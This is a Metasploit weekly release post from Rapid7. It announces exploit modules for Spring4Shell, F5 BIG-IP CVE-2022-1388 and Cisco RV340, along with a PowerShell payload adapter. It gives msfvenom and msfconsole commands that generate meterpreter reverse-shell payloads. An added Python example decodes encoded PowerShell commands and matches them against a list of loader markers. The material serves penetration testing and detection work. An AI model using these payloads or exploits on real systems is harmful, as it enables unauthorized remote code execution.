Metasploit Weekly Wrap-Up

Post Syndicated from Erin Bleiweiss original https://blog.rapid7.com/2022/05/13/metasploit-weekly-wrap-up-156/

Spring4Shell module

Community contributor vleminator added a new module which exploits CVE-2022-22965—more commonly known as "Spring4Shell." Depending on its deployment configuration, Java Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older can be vulnerable to unauthenticated remote code execution.

F5 BIG-IP iControl RCE via REST Authentication Bypass module

In addition, we have a new module that targets F5 iControl and exploits CVE-2022-1388, from contributor heyder. This vulnerability allows attackers to bypass iControl’s REST authentication on affected versions and achieve unauthenticated remote code execution as root via the /mgmt/tm/util/bash endpoint.

Cisco RV340 SSL VPN RCE module

The last of the new RCE modules this week—community contributor pedrib added a Cisco RV340 SSL VPN module, which exploits CVE-2022-20699. This module exploits a stack buffer overflow in the default configuration of Cisco RV series routers, and does not require authentication. This module also works over the internet and does not require local network access.

First Class PowerShell Command Payloads

Metasploit has had the ability to execute native 64-bit and 32-bit Windows payloads for quite some time. This functionality was exposed to module authors by way of a mixin, which meant that a dedicated target needed to be written. This placed an additional development burden on module authors who wanted to offer PowerShell commands for in-memory code execution of native payloads. Now module authors can just define the standard command target, and users can select one of the new cmd/windows/powershell* payloads. The new adapter converts the native code into a PowerShell command automatically, without additional effort from the module developer.

Since these are new payload modules, they can also be generated directly using MSFVenom:

./msfvenom -p cmd/windows/powershell/meterpreter/reverse_tcp LHOST=192.168.159.128

This is similar to using one of the psh- formatters with the existing -f option. However, because it’s a payload module, the additional PowerShell-specific options are accessible. For example, the resulting command can be base64-encoded to remove many special characters by setting Powershell::encode_final_payload=true.
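The encoded command such a payload produces ends up in process-creation telemetry on the host where it runs, so a defender wants to recover and triage it. The following Python is an added example for this post, not Metasploit code: it extracts the -EncodedCommand argument from a command line, decodes the UTF-16LE base64 that PowerShell expects, and flags markers of in-memory loading; the marker list and sample command lines are constructed for the example.

```python
import base64
import binascii

# Substrings often seen in scripts that stage or run code in memory. This is a
# constructed triage list for the example, not what Metasploit's adapter emits.
SUSPICIOUS_MARKERS = ("FromBase64String", "VirtualAlloc", "GetDelegateForFunctionPointer",
                      "Invoke-Expression", "IEX ", "DownloadString")

def encode_command(script):
    """Encode a script the way -EncodedCommand expects: base64 of UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def extract_encoded_command(cmdline):
    """Return the argument of -EncodedCommand from a process command line, or None."""
    tokens = [t.strip("\"'") for t in cmdline.split()]
    for i, tok in enumerate(tokens[:-1]):
        if not tok.startswith("-"):
            continue
        name = tok[1:].lower()
        # powershell.exe accepts -e, -ec and any prefix of -EncodedCommand;
        # -ep / -ex (ExecutionPolicy) must not match.
        if name and (name == "ec" or "encodedcommand".startswith(name)):
            return tokens[i + 1]
    return None

def decode_encoded_command(b64):
    """Decode an -EncodedCommand value; None if it is not valid base64/UTF-16LE."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None

def triage(cmdline):
    """Return (decoded script or None, list of matched markers) for one command line."""
    b64 = extract_encoded_command(cmdline)
    script = decode_encoded_command(b64) if b64 else None
    if script is None:
        return None, []
    return script, [m for m in SUSPICIOUS_MARKERS if m.lower() in script.lower()]

# Constructed sample command lines for this example (not real telemetry).
LOADER_SCRIPT = "$b=[Convert]::FromBase64String($x);Invoke-Expression([Text.Encoding]::UTF8.GetString($b))"
BENIGN_SCRIPT = "Get-Service | Where-Object Status -eq 'Running'"
SAMPLE_CMDLINES = [
    "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    "powershell.exe -nop -w hidden -enc " + encode_command(LOADER_SCRIPT),
    "powershell.exe -EncodedCommand " + encode_command(BENIGN_SCRIPT),
    "powershell.exe -e not*valid*base64",
]
```

Running triage over each entry of SAMPLE_CMDLINES shows the plain invocation and the benign encoded one produce no marker hits, the loader-style script is flagged, and the invalid base64 value is reported as undecodable rather than raising.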

New module content (4)

  • F5 BIG-IP iControl RCE via REST Authentication Bypass by Heyder Andrade, James Horseman, Ron Bowes, and alt3kx, which exploits CVE-2022-1388 – A new module has been added for CVE-2022-1388, a vulnerability in F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions. By making a special request, one can bypass iControl REST authentication and gain access to administrative functionality. This can be used by unauthenticated attackers to execute arbitrary commands as the root user on affected systems.
  • Cisco RV340 SSL VPN RCE from pedrib, which exploits CVE-2022-20699 – A new module has been added which exploits CVE-2022-20699, an unauthenticated stack overflow RCE vulnerability in the Cisco RV 340 VPN Gateway router. Successful exploitation results in RCE as the root user. This exploit can be triggered over the internet and does not require the attacker to be on the same network as the victim.
  • Spring Framework Class property RCE (Spring4Shell) by vleminator, which exploits CVE-2022-22965 – This adds a module that targets CVE-2022-22965, a remote code execution vulnerability in some installations of Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older. To be vulnerable, the application must be running on JDK 9+ and in this case, packaged and deployed as a war file, though it may be possible to bypass these limitations later.
  • PowerShell Command Adapter from zeroSteiner – This adds a new payload adapter for converting native x86 and x64 Windows payloads to command payloads using PowerShell.

Enhancements and features (4)

  • #16529 from dwelch-r7 – This updates Mettle payloads to support logging to file and now uses the same options as the other Meterpreters. For example, within msfconsole:
      use osx/x64/meterpreter_reverse_tcp
      generate -f macho -o shell MeterpreterDebugbuild=true MeterpreterDebugLogging='rpath:/tmp/foo.txt'
      to_handler
  • #16538 from adfoster-r7 – The Python Meterpreter loader library has been updated to address deprecation warnings that were showing when running these payloads using Python 3.4 and later.
  • #16551 from adfoster-r7 – The documentation for tomcat_mgr_upload.rb has been updated to include additional information on setting up a vulnerable Docker instance to test the module on.
  • #16553 from mauvehed – This updates Metasploit’s .github/SECURITY.md file with the latest steps to follow when raising security issues with Rapid7’s open source projects.

Bugs fixed (8)

  • #16485 from jeffmcjunkin – This updates the version check for the exploit/windows/local/s4u_persistence module to allow it to run on later Windows versions.
  • #16491 from adfoster-r7 – This fixes a bug whereby Meterpreter sessions and modules would crash when encountering a timeout issue due to using an invalid or deprecated error name.
  • #16531 from adfoster-r7 – This fixes a crash in various pihole modules when login authentication is required.
  • #16533 from cdelafuente-r7 – This updates the Meterpreter reg command to correctly handle setting the KEY_WOW64 flag with -w 32 or -w 64 – previously these flag values were unintentionally ignored.
  • #16540 from adfoster-r7 – This fixes an issue with Zeitwerk trying to load Go packages as part of the boot up process.
  • #16542 from sjanusz-r7 – This fixes a bug in msfconsole’s internal bookkeeping to ensure that closed channels are no longer tracked.
  • #16544 from adfoster-r7 – This updates post module windows/gather/ad_to_sqlite to no longer crash. The module will now additionally store the extracted information as loot.
  • #16560 from Ronni3X – This updates the nessus_connect login functionality to correctly handle the @ symbol being present in the password.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).